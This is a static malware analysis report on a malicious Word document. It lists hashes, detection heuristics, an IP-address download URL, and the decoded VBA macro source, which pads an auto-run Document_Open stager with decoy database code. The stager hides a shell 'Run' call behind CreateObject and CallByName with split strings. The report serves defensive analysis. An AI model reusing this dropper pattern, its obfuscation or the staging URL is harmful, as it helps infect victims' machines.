Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0e2ebc9de2b20c36…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 127.0 KB
Created: 2019-03-21 08:24:00
Authoring application: Microsoft Office Word
First seen: 2021-04-10
MD5: 3795c66c89d196c850e0c37405ba51c1
SHA-1: 964ba10f582faf6ddfa58034221fdd375235eaf3
SHA-256: 0e2ebc9de2b20c36ad038ab84a7de6c7a44386c078448ef777eaca6811f8d687
Risk score: 290

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6937918-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6937918-0
  • Malformed OLE auto-open stager with embedded ZIP payload [critical] OLE_RAW_MALFORMED_AUTOOPEN_STAGER
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    Set DOBIBOR = CreateObject("" + WINDOWS5.Label2.Tag & "")
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Matched line in script:
    CallByName DOBIBOR, "R" + "un", VbMethod, WINDOWS5.Label55.Tag & Chr(32) + " ACX=CHR(10) " & WINDOWS5.Tag + " " & " DGH=CHR(13) ", 0, False
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched line in script:
    Sub Document_Open()
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://79.141.171.160/alg (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10241 bytes
SHA-256: 050e090a832298e844fe9272ffb40cf31d5abafbd8fec87840e280be4e3cdd05
Signed: VBA project digital signature. Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True





    Public Function getQuestionId() As Integer
         getQues.tionValue "id"
    End Function
    Public Function getQuestionId2() As Integer
         getQuest.ionValue "id"
    End Function





Sub Document_Open()

Dim currentPi0 As Object
Dim currentPi7 As Object
Dim currentPi11 As Object
Dim currentPi12 As Object
Dim c As New Class1
c.PowerOn

Dim currentPi5 As Object
Dim currentPi6 As Object
Dim currentPi9 As Object


ActiveDocument.Close False
getQuestionId
Application.Quit False
End Sub
     



Public Sub fill(dgv)
        Dim adapter
        Dim dataset

            connection.Open
            adapter = SqlData.adapter(command)
            dataset = dataset
            adapter.fill (dataset)
            If dataset.Tables.Count > 0 Then
                dgv.Refresh
                dgv.DataSource = dataset.Tables(0)
            End If
            MsgBox (ex.Message)
            Thr.ow ex
            If connection.State = ConnectionState.Open Then
                connection.Close
            End If
End Sub

Sub LoadQuestions()
        db.fill (dgvQuestions)
    End Sub
     Sub LoadToolStripMenuItem_Click(sender, e)
     Hand.les LoadToolStripMenuItem.Click
        LoadQuestions
    End Sub
    Sub printenrolleedepentall()

        Try

            Dim connection As SqlConnection
            Dim command As SqlCommand
            Dim adapter
            Dim dataset
             s_sqlcmd1 = "SELECT code1, company, address, address2, tel, Web, email FROM companytab"
             s_sqlcmd2 = "SELECT enrolleeid, Surname, Firstname, othernames, dregister, sdate, edate, active, nationalid,NHIS, ogaid, hcpid, hcpname, ugstodate,sectortype FROM enrolleetab where Active = '" & False & "'"
            connection = SqlConnection(My.Settings.cnnstring)
            connection.Open

            ' load the table with headers into the dataset
            command = SqlCommand(s_sqlcmd1, connection)
            adapter.SelectCommand = command
            adapter.fill dataset, "companytab" ' tablename *MUST* match with the tablename used in the report

            ' load the 2nd table into the dataset (lines)
            adapter.SelectCommand.CommandText = s_sqlcmd2
            adapter.fill dataset, "enrolleetab"

            ' define the relation between the tables
            ' dataset.Relations.Add("relation", dataset.Tables("bill_headers").Columns("billnr"), dataset.Tables("bill_lines").Columns("parent_billnr"))

            ' dataset is ready, get rid of the objects used to construct it
            adapter.Dispose
            command.Dispose
            connection.Close

            ' Load the defined report with the dataset we just created
            Dim myreport As ReportDocument
            myreport = New ReportDocument
            myreport.Load (My.Settings.Rptpath & "\" & "Enrodep3.rpt")
            myreport.SetDataSource (dataset)

            ' bind viewer
            ' CrystalReportViewer1.DisplayGroupTree = False
            CrystalReportViewer1.ReportSource = myreport
            CrystalReportViewer1.RefreshReport
            CrystalReportViewer1.Show
            CrystalReportViewer1.Refresh
            MessageBox.Show (Excep.Message)


    End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub PowerOn()
Application.Run WINDOWS5.Label3.Tag
End Sub







     Function VerifySysInt(ByVal si As Byte) As Boolean
        
        Dim s As Integer
        Dim i As Integer
        s = 0
        For i = 0 To 254 '&HFB
            s = (s And &HFF) + si(i)
        Next
        s = s And &HFF

        If s = si(255) Then
            VerifySysInt = True
        Else
            VerifySysInt = False
        End If

    End Function

Attribute VB_Name = "Module1"
 Function MakeLong(ByVal extb, ByVal offset As Integer, ByVal sz As Integer) As Double
        Dim i As Integer
        Dim l As Double
        Dim neg As Double
        On Error Resume Next
        MakeLong = 0



        If sz = 3 Then
            If extb(offset) >= 128 Then
                extb(offset) = 128
                neg = -1#
            End If
            MakeLong = ((extb(offset) * (256 ^ 2)) + (extb(offset + 2) * (256 ^ 1)) + extb(offset + 1)) * neg
        End If
        If sz = 4 Then

            MakeLong = (extb(offset + 1) * (256 ^ 3) + extb(offset) * (256 ^ 2)) + (extb(offset + 3) * (256 ^ 1)) + extb(offset + 2)
        End If


        'For i = 0 To sz - 1
        '    l = extb(sz - 1 - i + offset)
        '    MakeLong = MakeLong + l * (256 ^ (i))
        'Next
    End Function



Public Sub PriceCount()
Dim PathTo1 As String
Dim DOBIBOR As Object

Dim eighteen101 As Object

Dim eighteen103 As Object
Dim eighteen109 As Object
Dim eighteen10 As Object
Set DOBIBOR = CreateObject("" + WINDOWS5.Label2.Tag & "")
Dim eighteen105 As Object
Dim eighteen106 As Object

Dim eighteen100 As Object
Dim eighteen107 As Object
On Error Resume Next


Dim eighteen1011 As Object
Dim eighteen1012 As Object
Dim eighteen104 As Object

Dim eighteen1034 As Object
Dim eighteen108 As Object
CallByName DOBIBOR, "R" + "un", VbMethod, WINDOWS5.Label55.Tag & Chr(32) + " ACX=CHR(10) " & WINDOWS5.Tag + " " & " DGH=CHR(13) ", 0, False



End Sub
 Sub Prininvoice()
        ' MessageBox.Show(rptrangecode)
        Try

                            Dim MyCommand As New SqlCommand
                Dim myDA As New SqlDataAdapter
                Dim myDS As New reportdata2  'The DataSet you created.
                Dim cryRpt As New ReportDocument
                cryRpt.Load (My.Settings.Rptpath & "\" & "invoicereport.rpt")
                MyCommand.connection = myConnection2  'AND OP1 = '" & "F7" & "' "
                MyCommand.CommandText = "select * from(select a.billcode,a.descr,a.invoicetopic,a.tdate,a.invoiceno,a.glcode,a.Amtword,a.salesrep,a.stax,a.itotal,a.netdue,a.addressto,a.signby,b.pcode,b.eqty,b.uprice,b.tax,b.discount,b.amt,c.company,c.address,c.address2,c.tel,a.accountname,a.accountno,a.bankname,a.branch,a.sortno from salesinvoicerpt a, sinvoicegridrpt b,companytab c Where rtrim(a.invoiceno) = rtrim(b.invoiceno) and rtrim(a.invoiceno) = '" & RTrim(rptrangecode) & "')school"
                MyCommand.CommandType = CommandType.Text
                myDA.SelectCommand = MyCommand
                myDA.fill myDS, "school"
                cryRpt.SetDataSource (myDS)
                CrystalReportViewer1.ReportSource = cryRpt
                CrystalReportViewer1.RefreshReport
                CrystalReportViewer1.Show
                CrystalReportViewer1.Refresh
            
            'Try
            'Dim cryRpt As New ReportDocument
            'cryRpt.Load(My.Settings.Rptpath & "\" & "invoicereport.rpt")
            'CrystalReportViewer1.ReportSource = cryRpt
            'CrystalReportViewer1.Refresh()
            'Catch ex As Exception
            '    MDIParent1.statusmsg.Text = ex.Message
            'End Try
        Catch
            MessageBox.Show (Excep.Message)
        End
    End Sub


 Sub printenrolleedepentsector()
        Try

            Dim connection As SqlConnection
            Dim command As SqlCommand
            Dim adapter As New SqlDataAdapter
            Dim dataset As New dataset
             s_sqlcmd1 = "SELECT code1, company, address, address2, tel, Web, email FROM companytab"
             s_sqlcmd2 = "SELECT enrolleeid, Surname, Firstname, othernames, dregister, sdate, edate, active, nationalid,NHIS, ogaid, hcpid, hcpname, ugstodate,sectortype FROM enrolleetab where Active = '" & False & "' and sectortype = '" & rptrangecode & "'"
            connection = SqlConnection(My.Settings.cnnstring)
            connection.Open

            ' load the table with headers into the dataset
            command = SqlCommand(s_sqlcmd1, connection)
            adapter.SelectCommand = command
            adapter.fill dataset, "companytab" ' tablename *MUST* match with the tablename used in the report

            ' load the 2nd table into the dataset (lines)
            adapter.SelectCommand.CommandText = s_sqlcmd2
            adapter.fill dataset, "enrolleetab"

            ' define the relation between the tables
            ' dataset.Relations.Add("relation", dataset.Tables("bill_headers").Columns("billnr"), dataset.Tables("bill_lines").Columns("parent_billnr"))

            ' dataset is ready, get rid of the objects used to construct it
            adapter.Dispose
            command.Dispose
            connection.Close

            ' Load the defined report with the dataset we just created
            Dim myreport As ReportDocument
            myreport = New ReportDocument
            myreport.Load (My.Settings.Rptpath & "\" & "Enrodep3.rpt")
            myreport.SetDataSource (dataset)

            ' bind viewer
            ' CrystalReportViewer1.DisplayGroupTree = False
            CrystalReportViewer1.ReportSource = myreport
            CrystalReportViewer1.RefreshReport
            CrystalReportViewer1.Show
            CrystalReportViewer1.Refresh
            MessageBox.Show (Excep.Message)
    End Sub


Attribute VB_Name = "WINDOWS5"
Attribute VB_Base = "0{2685ADE8-8692-49B9-8CE5-EFC8D03F2070}{780488BF-578B-4551-9E02-FFF5D3D52865}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module2"